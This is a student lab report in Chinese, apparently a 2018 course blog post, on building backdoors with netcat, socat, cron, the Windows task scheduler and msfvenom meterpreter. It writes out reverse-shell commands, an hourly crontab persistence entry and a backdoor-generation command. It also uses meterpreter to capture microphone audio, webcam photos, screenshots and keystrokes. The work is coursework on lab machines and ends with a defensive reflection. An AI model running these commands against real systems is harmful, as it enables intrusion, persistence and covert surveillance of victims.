后门原理与实践

一、实验操作步骤

1.Windows获得Linux Shell

ipconfig查询Windows主机IP地址

Windows中输入win+rcmdcdncat目录文件→ncat.exe -l -p 4310(监听端口)

在Linux输入 nc 192.168.1.185 4311 -e /bin/sh连接上端口

 

Windows获得Linux shell,可运行任意指令。

 

2.Linux获得Windows Shell

IP

 

 

 

Linux设置监听端口

Windows反弹连接

 

进制显示差异导致出现乱码。

 

3.使用nc传输数据

W监听端口4310L反弹连接,进行字符传输

 

 

 

W监听窗口4310

L输出crontab -e 命令建立一项定时任务

选择vim basic

 

 

在最后添加代码

10 * * * *  /bin/netcat 192.168.1.185 4311 -e /bin/sh 保存退出

 

5..使用socat获取主机操作Shell, 任务计划启动

控制面板->系统和安全->管理工具->任务计划,新建一个任务。

 

新建触发器设定开始任务为工作站锁定时

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4311 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4311,同时把cmd.exestderr重定向到stdout上:

 

创建后运行。

 L输入指令 socat - tcp:192.168.1.185:4311发现成功获得W Shell。

 

6.使用MSF meterpreter生成可执行文件,利用ncatsocat传送到主机并运行获取主机Shell

 

L输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.199 LPORT=4311 -f exe > 20154311_backdoor.exe 生成后门程序

 

Linux上使用 msfconsle 指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

设置完成后,执行监听指令 exploit

打开windows上的后门程序20154310_backdoor.exe

 

执行 record_mic 指令录制一段音频。

使用 webcam_snap 指令可以使用摄像头进行拍照。

 

执行 screenshot 指令可以进行截屏。

 

执行 keyscan_strat 指令开始记录下击键的过程,执行 keyscan_dump 指令读取击键的记录。

二、心得体会

四、心得体会

这次实验的难度整体来说比上一次可以说是稍难一些,在理解和实际操作的时候也更困难一点。不过当大部分理解并完成操作以后还是很有成就感的。虽然是模拟攻击,但还是让人有些后怕,自己的计算机只要连上了某个节点就会轻易得被留下后门,攻击者就能随意监视我甚至动用我的摄像头拍摄我的生活起居,想想还真是可怕。所以我们在日常操作中应该更加谨慎,绝不浏览危险网址,防止个人信息泄露。这是我学习这门课程以来的最大心得。

posted @ 2018-04-03 20:56  林启亮  阅读(193)  评论(0编辑  收藏